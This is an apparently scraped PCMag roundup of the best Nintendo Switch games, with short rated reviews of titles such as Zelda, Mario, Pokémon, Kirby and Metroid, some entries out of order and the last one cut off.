The game is also available on PC, but the Switch version deserves props for its hilarious motion controls that take the trombone simulation to the next level. Tokyo Mirage Sessions #FE Encore Tokyo Mirage Sessions #FE Encore3.5 Good While you wait for Persona 5 to come to the Nintendo Switch, Tokyo Mirage Sessions #FE, a late Wii U port, is the next best thing. This bewildering crossover between Fire Emblem and Shin Megami Tensei has players entering the entertainment industry of Japan’s stylish Shibuya and Harajuku districts. Of course, you also do battle against demons by summoning Fire Emblem characters through the power of song. A streamlined battle system and pop music tone should delight players who don’t even care about anime RPGs.  Unicorn Overlord 4.5 Excellent As a Vanillaware game, we’re not surprised that Unicorn Overlord has an unbelievably beautiful illustrated aesthetic. However, the game backs up its looks with deeply strategic role-playing gameplay that requires tactical thinking. Ogre Battle fans, this one’s for you. Unicorn Overlord review Void Bastards Roguelikes can be a polarizing genre as their repetitive nature, random elements, and punishing difficulty threaten to make the entire experience a waste of time. Void Bastards avoids this trap with a core gameplay loop that’s a joy to repeat and an addictive sense of progression stringing you along the whole time.Each new spaceship you raid is basically a tiny comic book-styled System Shock level with spooky enemies to shoot, machinery to hack, character traits to manage, and equipment to salvage. Use that equipment to construct permanent new weapons and perks that make you eager to start another raid. Our journey across the galaxy stretched on for hours because it’s so easy to say “just one more piece of loot.”Note that Void Bastards is published by Humble Bundle, which is owned by PCMag’s parent company, Ziff Davis. 
WarioWare: Get It Together WarioWare: Get It Together4.0 Excellent WarioWare is one of Nintendo’s best and most shockingly self-aware franchises. It’s about Mario’s gross, evil doppelganger starting a shady game company to get rich. Fortunately for you, these “microgames” remain a pure blast of weird and wonderful bite-sized entertainment. The new gimmick here lets you and a friend tackle challenges with different characters whose unique move sets make you rethink your approach on the fly. Hurry up! Xenoblade Chronicles X: Definitive Edition 4.0 Excellent This late-period Wii U gem finally returns to close out the Nintendo Switch era. A standalone entry of the Xenoblade saga, Xenoblade Chronicles X: Definitive Edition takes place on a lush open-world planet teeming with friendly and hostile creatures. Explore on foot or, eventually, by flying a giant mech. The dynamic RPG combat rewards smart timing and synchronizing party members. Along with improved visuals, this definitive edition adds a new epilogue story. Xenoblade Chronicles X: Definitive Edition review #best #nintendo #switch #games
    ME.PCMAG.COM
    The Best Nintendo Switch Games for 2025
    (Credit: René Ramos; Nintendo; Sora)The Best Games on Every Platform Animal Crossing: New Horizons Animal Crossing: New Horizons (for Nintendo Switch) 4.0 Excellent No game may end up defining 2020 more than Animal Crossing: New Horizons. Nintendo’s adorable life simulator has always had its fans. However, with the real world under lockdown, countless players have flocked to their own virtual islands to find community. Paying a mortgage to a raccoon is a small price to pay for the freedom to relax in your own social life again. Advance Wars 1+2: Re-Boot Camp Advance Wars 1 + 2: Re-Boot Camp 4.0 Excellent Fire Emblem isn't Nintendo's only awesome strategy series. If you prefer soldiers and tanks over knights and horses, check out Advance Wars and its terrific turn-based tactics. This remake includes campaigns from the first two Game Boy Advance games, offering hours upon hours of brilliantly designed missions. You can also design your own maps and play against friends online. Advance Wars 1 + 2: Re-Boot Camp review ARMS ARMS (for Nintendo Switch) 4.0 Excellent ARMS is Nintendo's newest take on the fighting game genre. It combines cartoonish aesthetics, sci-fi weapons, and arm-stretching boxing into an accessible, offbeat fighter with a lot of variety. It's a polished, fun, competitive game that bears more than a passing visual similarity to Splatoon. Though time will tell if ARMS gains any momentum within the esports scene, the game offers plenty of opportunity to swing fists at your friends. Bayonetta 2 Bayonetta 2 (for Nintendo Switch) 4.5 Excellent Bayonetta 2 is another fantastic game that launched on the wrong system. Years later its initial release, Bayo 2 still stands as one of the best action games out there, and now that it's been ported from the Wii U to the Switch it can get the attention and devotion it deserves. Tight controls, robust challenge, and plenty of style make this stand out as a pinnacle of action games. 
Bayonetta 3 Bayonetta 3 (for Nintendo Switch) 4.5 Excellent Just when you thought Bayonetta couldn’t get any more bewitching, PlatinumGames delivers an absolute master class on video game action with Bayonetta 3. Besides Bayonetta’s familiar punches, kicks, and guns, you can further expand her combat options by summoning giant demons and directing their attacks. Meanwhile, the multiversal story is ridiculous, even by Bayonetta standards. Bloodstained: Ritual of the Night Bloodstained: Ritual of the Night (for Nintendo Switch) 4.0 Excellent If Bloodstained: Ritual of the Night's story of a demonic castle and a lone savior sounds incredibly familiar, it should: the game was spearheaded by Koji Igarashi, the big brain behind many revered Castlevania games. Bloodstained is an excellent Castlevania game in everything but name, hitting the same beats Symphony of the Night, Aria of Sorrow, and Order of Ecclesia did. If you're thirsty for a new, enjoyable Castlevania-like game that calls back to before Lords of Shadow rebooted the series and Mirror of Fate completely failed to capture any of its luster, this is the game for you. Bayonetta Origins: Cereza and the Lost Demon 4.0 Excellent Bayonetta Origins: Cereza and the Lost Demon isn’t a hard-hitting, nonstop action game like the main Bayonetta trilogy. Instead, this is a relatively relaxed adventure game full of puzzles and gorgeous storybook visuals. Young witch Cereza teams up with a young demon, Cheshire, to tackle challenges neither could complete alone. Although the combat isn’t quite as complex as in the mainline Bayo games, there’s still plenty of flair to the faerie fights. Bayonetta Origins: Cereza and the Lost Demon review Bravely Default II Bravely Default II (for Nintendo Switch) 4.0 Excellent Modern Final Fantasy games have become their own beasts, but games like Bravely Default II remind us why we fell in love with those classic Square Enix JRPGs. 
In battle, you can either perform multiple actions at once (Brave) or wait to save up for later turns (Default), which opens up many strategic possibilities. On Switch, the diorama world looks more beautiful and nostalgic than ever. Cadence of Hyrule: Crypt of the NecroDancer Cadence of Hyrule: Crypt of the NecroDancer (for Nintendo Switch) 4.0 Excellent Crypt of the NecroDancer was a surprise indie hit in 2015, catching gamers' eyes and ears with its combination of roguelike randomized dungeon exploration with rhythm game beat-keeping. It hit the Nintendo Switch in 2018, and now it's back in a new and much more Nintendo-specific form: Cadence of Hyrule: Crypt of the NecroDancer, a title that injects rhythm game mechanics into The Legend of Zelda. This Switch game seamlessly combines Zelda and Crypt of the NecroDancer, creating a surprisingly accessible and thoroughly enjoyable experience played to the beat of Zelda's classic and music. Cassette Beasts 4.0 Excellent Pokémon doesn't have a monopoly on monster catching. Cassette Beasts is a stylish, indie RPG that puts its own spin on collecting creatures and pitting them against each other in combat. The open world has many quests, the fighting mechanics have the extra depth that experienced players crave, and the story veers off in cool, surreal directions. Most importantly, there are some great monster designs, like ghostly sheep and living bullets. Cassette Beasts review Clubhouse Games: 51 Worldwide Classics Clubhouse Games: 51 Worldwide Classics (for Nintendo Switch) 4.0 Excellent Forget fancy new video games. Sometimes you just want to play chess, solitaire, or one of the other virtual vintage games that make up this classic compilation. Not only is this a convenient way to play some of history’s most enduring games with friends, but Clubhouse Games: 51 Worldwide Classics does a great job educating you on that history, including the fascinating early Hanafuda history of Nintendo itself. 
Game Builder Garage Game Builder Garage (for Nintendo Switch) 4.5 Excellent If you thought Super Mario Maker was a great way to learn about game development, give Game Builder Garage a spin. This incredibly powerful 3D game creation tool lets you make anything from platformers to racing games to puzzle mysteries. Thorough, friendly tutorials explain the robust “Nodon” coding language, so even novices can create hitboxes and manipulate the Z-axis like pros. Donkey Kong Country: Tropical Freeze Donkey Kong Country: Tropical Freeze (for Nintendo Switch) 4.0 Excellent The Switch has gotten a reputation as a machine for game ports, and there's nothing wrong with that. The Wii U wasn't the massive hit the Wii was, but it still had several excellent games that went underappreciated in their time. Donkey Kong Country: Tropical Freeze is one of them, a sequel to Donkey Kong Country Returns with even more challenge and variety. The Switch version of this game adds Funky Kong Mode, an easier setting and new playable character (Funky Kong himself) that makes the surprisingly brutal platforming feel a little less punishing. Hades Hades (for Nintendo Switch) Hades takes the punishing and divisive roguelike genre and masterfully twists it into one of the year's most addictive games. Fighting your way out of the Greek underworld with randomly changing skills and weapons feels incredible. The family drama at the game’s core gives you that extra narrative push to keep going. Plus, everyone is smoking hot. Indivisible Indivisible (for Nintendo Switch) While many role-playing games draw their influences from Western folklore, even RPGs made in Japan, Indivisible carves out a unique identity with a fresh Southeast Asian flavor. The 2D animation is exquisite, as we would expect from the developer of Skullgirls. Gameplay is a mix of nonlinear spaces to explore and enemies to defeat in tactical battles. Of the two types of play, the exploration sections impress us more. 
In these bits you find your way forward by using an axe to fling yourself up walls or by shooting arrows to blind sentries. That's just more satisfying than the frantic messes the fights, caught awkwardly between turn-based and real-time combat, can turn into.   Kirby's Return to Dream Land Deluxe Kirby’s Return to Dream Land Deluxe (for Nintendo Switch) 4.5 Excellent Kirby’s Return to Dreamland is a traditional, side-scrolling adventure compared to Kirby’s more radical outings. Still, it’s an excellent showcase of what makes even a normal Kirby game irresistible. This Deluxe version enhances the Wii co-op classic with a sweet, new art style; extra powers; and an original epilogue. Kirby’s Return to Dream Land Deluxe (for Nintendo Switch) review Kirby and the Forgotten Land Kirby and the Forgotten Land (for Nintendo Switch) 4.0 Excellent Kirby and the Forgotten Land finally gives the pink puffball the epic 3D adventure that Mario, Link, and Samus got years ago. Float through the skies in creative levels bursting with secrets. Upgrade familiar powers, such as hammers and swords, into formidable new forms. Or just sit back and marvel at how Nintendo made the post-apocalypse look so cute. Kirby Star Allies Kirby Star Allies (for Nintendo Switch) 4.0 Excellent Kirby games are always fun. Whether they're the simple platformers like Kirby's Adventure or weirdly gimmicky experiences like Kirby's Dream Course, every first-party experience with Nintendo's pink puff ball has been enjoyable. Kirby Star Allies is no different, with a lighthearted campaign filled with colorful friends and abilities, surprisingly challenging extra modes to unlock, and support for up to four players at once. Get on the Friend Train! The Legend of Zelda: Breath of the Wild The Legend of Zelda: Breath of the Wild (for Nintendo Switch) 4.5 Excellent Hyrule is in danger again, and Link must save it. 
That's been the theme for nearly every Legend of Zelda game, and it's still the case in The Legend of Zelda: Breath of the Wild. The series' basic premise and Link/Zelda/Ganon dynamic are present, but nearly everything else is different. The classic Zelda dungeon-exploration structure is replaced by a huge open world that's filled with destructible weapons, monsters, puzzles, and quests. Breath of the Wild's scope is one previously unseen in the Zelda series, and Nintendo executes the adventure-filled world with aplomb. The Legend of Zelda: Echoes of Wisdom The Legend of Zelda: Echoes of Wisdom - Nintendo Switch, Nintendo Switch – OLED Model, Nintendo Switch Lite 4.5 Excellent The Legend of Zelda: Echoes of Wisdom turns Nintendo's epic franchise on its head in more ways than one. Instead of the swordsman, Link, you play as Princess Zelda. Likewise, you don't directly attack enemies; you summon useful items and foes to aid you on the mission. The game takes the creative, improv spirit of Breath of the Wild and applies it to a classic 2D top-down Zelda adventure with delightful results. Plus, it just looks adorable. The Legend of Zelda: Echoes of Wisdom - Nintendo Switch, Nintendo Switch – OLED Model, Nintendo Switch Lite review The Legend of Zelda: Skyward Sword HD The Legend of Zelda: Skyward Sword HD (for Nintendo Switch) 3.5 Good No Zelda games are terrible, but no game polarizes the fan base quite like Skyward Sword. Fortunately, this HD remaster speeds up the pacing, enhances the graphics, and offers a button-based control scheme if you don’t care for motion controls. The structure feels especially linear in a post-Breath of the Wild world, but Zelda’s origin story is still worth experiencing. The Legend of Zelda: Tears of the Kingdom The Legend of Zelda: Tears of the Kingdom - Nintendo Switch, Nintendo Switch (OLED Model), Nintendo Switch Lite 5.0 Outstanding At launch, it was tough to imagine the Switch ever getting another game as good as Breath of the Wild. 
But years later, The Legend of Zelda: Tears of the Kingdom delivers everything we could have possibly wanted and more in this direct sequel to one of the greatest games ever made. Exploring the skies and underground caves makes Hyrule more vast than ever. New powers let you break the world apart and rebuild it as you see fit. Tears of the Kingdom is an irresistible, hypnotic adventure, and an absolute must-play for all RPG fans. The Legend of Zelda: Tears of the Kingdom - Nintendo Switch, Nintendo Switch (OLED Model), Nintendo Switch Lite review Lego Star Wars: The Skywalker Saga Lego Star Wars: The Skywalker Saga (for Nintendo Switch) 4.0 Excellent Who knows what the future holds for Star Wars, but Lego Star Wars: The Skywalker Saga provides a terrific toybox take on Episodes I-IX. The Lego recreations of all nine movies gives you plenty to experience as you blast baddies and solve Force puzzles. But what really makes this game so special is how it turns the entire Star Wars galaxy into an open world to explore, whether it’s on colorful planets or through the vastness of outer space in your trusty starfighter. Lego Star Wars: The Skywalker Saga (for Nintendo Switch) review Luigi's Mansion 3 Luigi's Mansion 3 - Nintendo Switch Standard Edition What started as a weirdly specific parody of Ghostbusters and Resident Evil has become of one the finest Mario spin-off adventures. Luigi’s spooky journey throughout a haunted hotel is arguably the most visually stunning game on the Nintendo Switch. Along with sucking up ghosts, you can now slam them (back) to death and shoot plungers to pull apart the scenery. Your greatest, and grossest, tool has to be Gooigi. This slimy green doppelgänger expands your puzzle-solving powers and provides an easy option for younger co-op partners. 
Lumines Remastered Lumines Remastered (for Nintendo Switch) 4.5 Excellent Puyo Puyo Tetris is great for classic, competitive block-dropping, but it's a bit overly perky and anime-ish to really relax to. Lumines Remastered is the ultimate chill-out block-dropper, syncing the mesmerizing pattern matching to dozens of hypnotic electronic and trance tracks. Load it on your Switch, put on your favorite headphones, and space out while you build huge combos. Mario & Luigi: Brothership Mario & Luigi: Brothership - Nintendo Switch, Nintendo Switch – OLED Model, Nintendo Switch Lite 4.0 Excellent Mario & Luigi: Brothership revives a Mario RPG subseries as a grand nautical adventure. The plumbers sail the seas, reconnecting scattered islands and battling foes with familiar, frenetic turn-based combat. On Nintendo Switch, the visuals and animations turn Mario and Luigi into cartoon-like characters. Mario & Luigi: Brothership - Nintendo Switch, Nintendo Switch – OLED Model, Nintendo Switch Lite review Mario + Rabbids: Kingdom Battle Mario + Rabbids: Kingdom Battle (for Nintendo Switch) 4.0 Excellent Before Minions, there were Rabbids, Ubisoft's manic, sublingual, noseless horde spawned from Rayman: Raving Rabbids. Then the weird, bug-eyed, rabbit-like creatures caused havoc in their own game series. Now, they're running around Mario's stomping grounds in Mario + Rabbids: Kingdom Battle. This strategy-RPG combines two cartoonish worlds with satisfyingly deep, XCOM-like gameplay for a very fun and strange experience. It's a combination of styles that work much, much better than you'd expect. Mario + Rabbids Sparks of Hope Mario + Rabbids Sparks of Hope (for Nintendo Switch) 4.0 Excellent Mario + Rabbids Kingdom Battle proved that these two mascots could come together for excellent, approachable tactics gameplay. Sparks of Hope is more of the same, but even better. Equipping Sparks lets you further customize your squad’s strategic abilities. 
Wide open levels provide entertaining exploration between the skirmishes. Mario Golf: Super Rush Mario Golf: Super Rush (for Nintendo Switch) 4.0 Excellent Leave it to Mario to find a way to make golf games feel fresh again. Mario Golf: Super Rush’s standout gimmick has golfers teeing off all at once, and then physically running across the course to take their next shot. You still have to plan smart strokes, but you also need to keep an eye on the clock. The lengthy, single-player adventure teaches you the ropes before you head online to face real challengers on the green. Mario Kart 8 Deluxe Mario Kart 8 Deluxe (for Nintendo Switch) 4.5 Excellent Mario Kart 8 stood out as the best-looking Mario Kart game yet when it came out on the Nintendo Wii U. Instead of making a new Mario Kart for the Nintendo Switch, Nintendo brought Mario Kart 8 to its new game system. In the process, Nintendo threw in both previously released DLC packs and made some few welcome changes to its multiplayer options, justifying the game's full retail price. Mario Kart 8 Deluxe is the most robust game in the series so far, and with the optional portability of the Switch, it ranks as a must-own title. Mario Strikers: Battle League Mario Strikers: Battle League (for Nintendo Switch) 4.0 Excellent Mario has played many sports throughout the years, but Mario Strikers: Battle League gives us the arcade soccer chaos fans have craved for more than a decade. It features fast-paced action, while allowing for depth and skill should you choose to push yourself. Customize your characters with stat-changing gear. Join online clubs to compete in ongoing seasons. And no one animates the Mario universe with as much style and attitude as the developers at Next Level Games. Mario Strikers: Battle League (for Nintendo Switch) review Mario Tennis Aces Mario Tennis Aces (for Nintendo Switch) 4.0 Excellent You don't need to be a sports fan to enjoy Nintendo sports games. 
If a sport has "Mario" in front of it, it's probably going to be a fun, very unrealistic romp instead of a serious simulation. Mario Tennis Aces is an exciting tennis game not because of any realistic physics, but because of fast, responsive gameplay and strategic mechanics that make matches feel more like rounds in a fighting game than tennis sets. Marvel vs. Capcom Fighting Collection: Arcade Classics Marvel vs. Capcom Fighting Collection: Arcade Classics - Nintendo Switch 4.0 Excellent Marvel vs. Capcom Fighting Collection: Arcade Classics lets you finally relive six legendary 2D fighters starring Marvel superheroes and Capcom icons. From the humble X-Men: Children of the Atom to the over-the-top Marvel vs. Capcom 2, this is vital fighting game history. An art gallery, modern control options, rollback netcode, and the underrated Punisher beat 'em up sweeten the deal. Marvel vs. Capcom Fighting Collection: Arcade Classics - Nintendo Switch review Metal Slug Tactics Metal Slug Tactics (for Nintendo Switch) Metal Slug Tactics trades the mainline series' fast-paced running and gunning for methodical, turn-based strategy gameplay. Still, it's just as action-packed as ever. Line up your units for devastating sync attacks. Enjoy the beautiful old-school sprite work. Plan your turns, hop into a giant tank, and obliterate foes. Metroid Dread Metroid Dread (for Nintendo Switch) 4.5 Excellent After nearly 20 years, Metroid Dread brings Samus Aran back to her 2D, bounty hunting roots for the true Metroid 5. In it, you explore a dense, dangerous new planet full of powers to pick up and enemies to eliminate. From uncompromising boss battles to terrifying chases, Dread more than lives up to its subtitle. If there's anyone strong enough to take down the terror, it's Nintendo's leading lady. Metroid Prime Remastered 5.0 Outstanding Metroid Prime is one of the best games ever made. 
It takes Super Metroid’s brilliant exploratory action and perfectly translates it to 3D with immaculate level design and immersive first-person shooting. This remaster, which ventures into the remake territory, includes everything that worked in the original, and ups the presentation to modern, beautiful standards. Plus, you can now play with dual-stick controls. Bring on Metroid Prime 4. Metroid Prime Remastered review Miitopia Miitopia (for Nintendo Switch) 3.5 Good Miis can do more than just play Wii Sports. In Miitopia, you use Nintendo’s cartoon caricatures to cast yourself, friends, and family as heroes and villains in a fast-paced, whimsical role-playing game. Turn yourself into a brave knight, while your buddy supports you as a pop star. The joke can’t quite sustain the whole runtime, but Miitopia is wildly entertaining.   Monster Hunter Stories 2: Wings of Ruin Monster Hunter Stories 2: Wings of Ruin (for Nintendo Switch) 4.0 Excellent If traditional Monster Hunter is just too intense for you, Monster Hunter Stories 2 lets you experience this cutthroat world as a turn-based JRPG. Befriend monsters and take them into battle. Hatch eggs to expand your menagerie. Strategic battles draw upon familiar Monster Hunter concepts. And, of course, Rathalos is here. New Pokemon Snap New Pokemon Snap (for Nintendo Switch) 4.0 Excellent The beloved Nintendo 64 spin-off finally gets the update it deserves. Instead of capturing Pokemon and forcing them to battle, New Pokemon Snap asks you to take beautiful photos of Pikachu and friends in their natural surroundings. The on-rails gameplay feels like a nonviolent version of a light gun game. The gorgeous graphics will inspire you to share your best pics online for the world to see. Nickelodeon All-Star Brawl Nickelodeon All-Star Brawl (for Nintendo Switch) 4.0 Excellent Imagine Super Smash Bros., but instead of playing as video game mascots, you control beloved cartoon characters beating each other senseless. 
That's Nickelodeon All-Star Brawl. From SpongeBob SquarePants to Ren and Stimpy to the Teenage Mutant Ninja Turtles, the roster covers all eras of Nicktoon nostalgia. Beyond the ironic meme potential, "Nick Smash" features genuinely fantastic gameplay made by a team clearly passionate about this particular form of "platform fighting" games. Nickelodeon All-Star Brawl (for Nintendo Switch) review Nintendo Labo Toy-Con 01 Variety Kit Nintendo Labo Toy-Con 01 Variety Kit (for Nintendo Switch) 5.0 Outstanding Labo is a weirder concept than the Switch itself. It's based around building cardboard "Toy-Cons" in which you place the Switch's components to let you do new things with them. It's also surprisingly functional, entertaining, and educational. The Nintendo Labo Variety Kit has all of the parts you need to build several different Toy-Cons like a piano and motorcycle handlebars, and walks you through every step of the process. Just building the Toy-Cons is fascinating, but the Toy-Con Garage mode adds surprisingly robust programming options to let you create your own remote-controlled creations. Nintendo Labo: VR Kit 4.5 Excellent It took over 20 years, but Nintendo finally got over its fear of virtual reality after the disastrous Virtual Boy. The Labo VR Kit lets you build your own VR headset that uses the Nintendo Switch and a set of lenses to create a stereoscopic image, and then insert that headset into different Toy-Con controllers to play a variety of games. That's already a ton of fun for $79.99 (or $39.99 for a starter set that only includes one Toy-Con to build instead of five). Add a programming environment on top that lets you create your own 3D games, and you have an impressive package. No More Heroes III No More Heroes III (for Nintendo Switch) 4.0 Excellent No More Heroes III, like the other games in Suda51’s hack-and-slash trilogy, is a punk art game. Sure, some parts may be “bad,” like the technical jank or empty open worlds. 
But it’s all in service of larger commentary on everything from schlocky movies to wrestling fandom to the video game industry itself. Plus, cutting aliens down to size feels legitimately fantastic, and really that’s what matters.  Penny's Big Breakaway 4.0 Excellent The creators of Sonic Mania deliver a new indie 3D platformer that feels like a forgotten Sega classic. Use your trusty yo-yo to swing and roll through colorful, tightly designed levels that test your momentum control. Bosses and other enemies are sometimes more annoying than fun, but the movement mechanics are a joy to master. Penny's Big Breakaway review Pikmin 3 Deluxe Pikmin 3 Deluxe (for Nintendo Switch) 3.5 Good Pikmin isn’t the most recognizable Nintendo franchise, but the approachable real-time strategy game carries as much magic as Mario and Zelda. This Wii U port offers more missions and ways to control your army of cute plant creatures. The campaign's local, co-op play opens all kinds of new strategies, too. Veterans of previous Pikmin wars may have seen most of this content before, but Pikmin newcomers should absolutely jump into this tiny, tactical, and tactile world. Pikmin 4 Pikmin 4 (for Nintendo Switch) 4.5 Excellent Pikmin has always been good, but the quirky real-time strategy game has never broken out of its cult status over the past 20 years. Hopefully, that all changes with Pikmin 4. The biggest and best Pikmin game yet, Pikmin 4 gives you new Pikmin to command, a cute and customizable dog companion, and many gorgeous areas to strategically explore whether above ground or in countless caves. The multiplayer could be better, but Pikmin 4 is a top-tier Nintendo game everyone should play. Pikmin 4 (for Nintendo Switch) review Pizza Tower Pizza Tower feels like a fever dream of 1990s cartoons, internet memes, and retro Wario Land games. Don’t let his pudgy exterior fool you. 
Protagonist Peppino Spaghetti has many incredibly fast and fluid platforming tools, including dashing and wall-running. You’ll need to master those tools to beat levels as fast as possible, without losing your mind. Pokemon Legends: Arceus Pokemon Legends: Arceus (for Nintendo Switch) 3.5 Good Pokemon Legends: Arceus finally gives the Pokemon franchise a long-awaited refresh. Taking place in the distant past of Diamond and Pearl’s Sinnoh region, Arceus lets you capture and study wild Pokemon in a world where humans still fear the creatures. Vast open fields, revamped battle mechanics, and an utterly addictive approach to exploration create the most immersive Pokemon experience yet. Pokemon Let's Go, Pikachu/Eevee! Pokemon: Let's Go, Eevee! 4.0 Excellent If the traditional Pokemon RPGs are still just a bit too complex for you, consider the casual adventures Pokemon Let's Go Pikachu and Let's Go Eevee. This duo remakes the first-generation Pokemon Yellow, with bright, colorful, HD graphics, and a new capture mechanic based on Pokemon Go. In addition, there are trainer battles and turn-based combat for people who dig classic Pokemon. Pokémon Scarlet and Violet Pokémon Scarlet - Nintendo Switch 4.0 Excellent Pokemon Sword and Shield and Pokemon Legends: Arceus experimented with expansive zones, but Pokémon Scarlet and Violet finally turns the monster-catching game into an open-world RPG. As we always suspected, the addictive Pokémon formula works brilliantly when you can go wherever you want, exploring towns and catching whatever monsters you encounter. Lingering technical issues keep it from reaching its full potential, but this is Pokémon's shining future. Pokemon Sword/Shield Pokemon Sword (for Nintendo Switch) 4.0 Excellent Pokemon Let’s Go Pikachu and Eevee were a nice warmup, but Pokemon Sword and Shield are the real home console Pokemon games we’ve been looking forward to playing. Travel across big, open landscapes to capture even bigger Pokemon. 
New expansions packs in 2020 give trainers even more regions to explore and more Pokemon to battle without having to buy a third version. The Pokedex will be complete before you know it.  Prince of Persia: The Lost Crown 4.5 Excellent Prince of Persia returns to its 2D roots with The Lost Crown, a standout entry in the crowded modern Metroidvania market. Everything just clicks. The massive map is a joy to explore. Clever puzzles make the most of inventive abilities. Deep combat systems allow satisfying expression. Challenging DLC further expands the adventure. And the presentation combines Persian flair with anime exuberance. Prince of Persia: The Lost Crown review Pokemon Unite Pokemon Unite (for Nintendo Switch) 3.5 Good If you’re curious about the MOBA genre, but scared of esports heavy-hitters like Dota 2 and League of Legends, then Pokemon Unite is the perfect place to get started. Two teams of five Pokemon battle each other in real-time to score goals across the map. This free-to-play game is also coming soon to mobile, so you’ll find plenty of aspiring Pokemon masters to challenge. Puyo Puyo Tetris Puyo Puyo Tetris (for Nintendo Switch) 4.5 Excellent Practically everyone in North America has heard of Tetris. Far fewer have heard of Puyo Puyo. Both are block-dropping puzzle games, but while Tetris has been Tetris for decades, Puyo Puyo has had many different tweaks and name changes in attempts to appeal to the west. It came out first as Puyo Pop, then received different licensed incarnations, such as Puzzle Fighter and Dr. Robotnik's Mean Bean Machine. Now, Puyo Puyo is making its mark here, thanks to Sega and a double-billing with Tetris. The pairing results in a title that's plump with game modes, unlockables, and solo and multiplayer options. Red Dead Redemption Red Dead Redemption (for Nintendo Switch) Grand Theft Auto put Rockstar Games on the map, but for many the team's true masterpiece is the epic, open-world Western saga known as Red Dead Redemption. 
John Marston's cowboy odyssey has the scathing tone you'd expect from the developer, but it also has heart and a sense of tragedy. The Nintendo Switch version perfectly maintains the original gameplay experience, from stylish shootouts to riding your horse across the empty desert. It also includes the Undead Nightmare DLC. Finally, a version of Red Dead you can play in a tent under the stars. Rebel Galaxy Outlaw Rebel Galaxy Outlaw (for Nintendo Switch) Rebel Galaxy Outlaw has enough action-packed, visually dazzling spaceship dogfights to excite any Star Fox fan. The real joy, however, is in the quieter moments, when you act out your galactic trucker fantasies by carrying cargo from space stations named after Texas towns. Improving your ship is a bit of a grind, but it’s a rewarding one. If you get bored, you can always shoot down pirates—or become one yourself. Rocket League Rocket League (for Nintendo Switch) Rocket League is soccer, with remote controlled cars and funny hats. It's amazing how compelling a game can be when the entire point of it is to use a car to knock a ball into a goal, but Rocket League nails it. Wild physics, colorful visuals, and simple game types you can keep coming back to while challenging friends and strangers make this one of the best pseudo-sports games on the Switch. Shovel Knight: Treasure Trove Shovel Knight: Treasure Trove (for Nintendo Switch) Platforming excellence comes to the Nintendo Switch courtesy of Yacht Club Games' Shovel Knight: Treasure Trove. This downloadable package includes the original Shovel Knight, one of 2014's top titles, as well as all the previously released DLC including the Plague of Shadows and Specter of Torment campaigns. If you long for some retro, 2D action, Treasure Trove a a game that you should not miss. Splatoon 3 Splatoon 3 (for Nintendo Switch) 4.0 Excellent Splatoon 3 isn't much different than Splatoon 2 (which in turn wasn't much different from Splatoon 1). 
However, no other online team-based shooter delivers an experience quite like this. Inking the ground, splatting opponents, and transforming from squid to kid never felt this good. The wealth of solo, cooperative, and competitive modes will keep you busy. Keep the party going with the excellent, roguelike DLC Side Order. Splatoon 3 (for Nintendo Switch) review Street Fighter 30th Anniversary Collection Street Fighter 30th Anniversary Collection (for Nintendo Switch) Street Fighter has been the biggest name in fighting games for decades, and Capcom is proud of that fact. While it really got going with Street Fighter II: The World Warrior, the Street Fighter 30th Anniversary Collection lets you play the original Street Fighter in all of its genre-building glory. And, after you realize how bad that first attempt was, you can play the much better sequels like Super Street Fighter II, Street Fighter Alpha 3, and Street Fighter III: Third Strike. You're looking at a dozen games in this collection, with loads of extra content like soundtracks and sprite data. Streets of Rage 4 Streets of Rage 4 (for Nintendo Switch) Streets of Rage 4 pounds life back into the dead sidescrolling beat ‘em up genre. The gameplay may not have progressed that much since Sega’s trilogy in the 1990s, but taking down hordes of goons with your fists has never looked better thanks to a thoroughly modern illustrated art style. A risky new mechanic that burns health to power special moves, unless you avoid getting hit, adds some fighting-game flair.  Super Bomberman R Super Bomberman R (for Nintendo Switch) 3.5 Good Bomberman's return to console gaming was one of the most surprising moments in the Nintendo's January 2017 Switch game showcase. Considering that the little guy's now the property of Konami, a company that's more known for killing P.T. 
and warring with Metal Gear maestro Hideo Kojima than making video games, it was shocking to see Super Bomberman R announced as a Nintendo Switch launch title. Thankfully, this newest entry in the beloved, bomb-tossing franchise keeps the series' simple and addicting core gameplay intact, and adds tons of modes, collectible items, and characters to keep things fresh. Super Mario 3D All-Stars Super Mario 3D All-Stars (for Nintendo Switch) 3.5 Good This classic Mario collection combines Super Mario 64, Super Mario Sunshine, and Super Mario Galaxy. They may not have received the radical visual overhaul of the original Super Mario All-Stars, but these are still three of the finest 3D platformers ever made—now playable in HD and on the go. Nintendo says this collection is a limited release, so get it while you can. Super Mario 3D World + Bowser's Fury Super Mario 3D World + Bowser's Fury (for Nintendo Switch) 4.5 Excellent Super Mario 3D World seamlessly blends the free-roaming, open-ended platforming of Mario 3D’s adventures with the concentrated multiplayer mayhem of his latest 2D romps. It was great on Wii U, and now it's even better on Nintendo Switch. However, this package’s real star is Bowser’s Fury, an ambitious spin-off that reimagines what an open-world Mario game can be. Super Mario Bros. Wonder Super Mario Bros. Wonder - Nintendo Switch 4.5 Excellent In the beginning, all Super Mario games were wonderful 2D sidescrollers that dazzled us with their sheer imagination. But as Mario set his sights on 3D heights, the New Super Mario Bros. series turned 2D Mario into a safe and bland nostalgia franchise. No more! Super Mario Bros. Wonder fills 2D Mario to the brim with whimsy, creativity, and joyful confusion. Turn levels into psychedelic dreamscapes! Customize your abilities! Compete against friends online! Transform into an elephant! You can do all of this and more in Super Mario Bros. Wonder. Super Mario Bros. 
Wonder - Nintendo Switch review Super Mario Maker 2 Super Mario Maker 2 (for Nintendo Switch) 4.5 Excellent Super Mario Maker 2 is a welcome update to the original Super Mario Maker. It adds a new skin, new themes, and plenty of new tools for making more creative and challenging Mario levels. You can create levels based on the graphics and mechanics of Super Mario Bros., Super Mario Bros. 3, Super Mario World, and New Super Mario Bros., just like in the previous Super Mario Maker. These levels can use one of 10 different themes: Ground, Sky, Underground, Forest, Underwater, Ghost House, Desert, Airship, Snow, and Castle. Sky, Forest, Desert, and Snow are new to Super Mario Maker 2. For more variety, you can toggle each theme to its nighttime variant, which adds unique twists to the gameplay. And, of course, you can share your creations online. Super Mario Odyssey Super Mario Odyssey (for Nintendo Switch) 5.0 Outstanding In Super Mario Odyssey, the heroic plumber returns to open-world game design for the first time since the incredible Super Mario 64. Though Odyssey isn't as technically groundbreaking as its predecessor, the action-platformer is packed to the brim with hat-tossing combat. Yes, hat tossing. This time around, Mario has a new friend, Cappy, who lets Mario dispatch enemies with the flick of the wrist. And, even better, Mario can assume the identity of an enemy, gaining its abilities, by plopping Cappy on the foe's head. Super Mario RPG Super Mario RPG - Nintendo Switch (OLED Model), Nintendo Switch Lite, Nintendo Switch 4.0 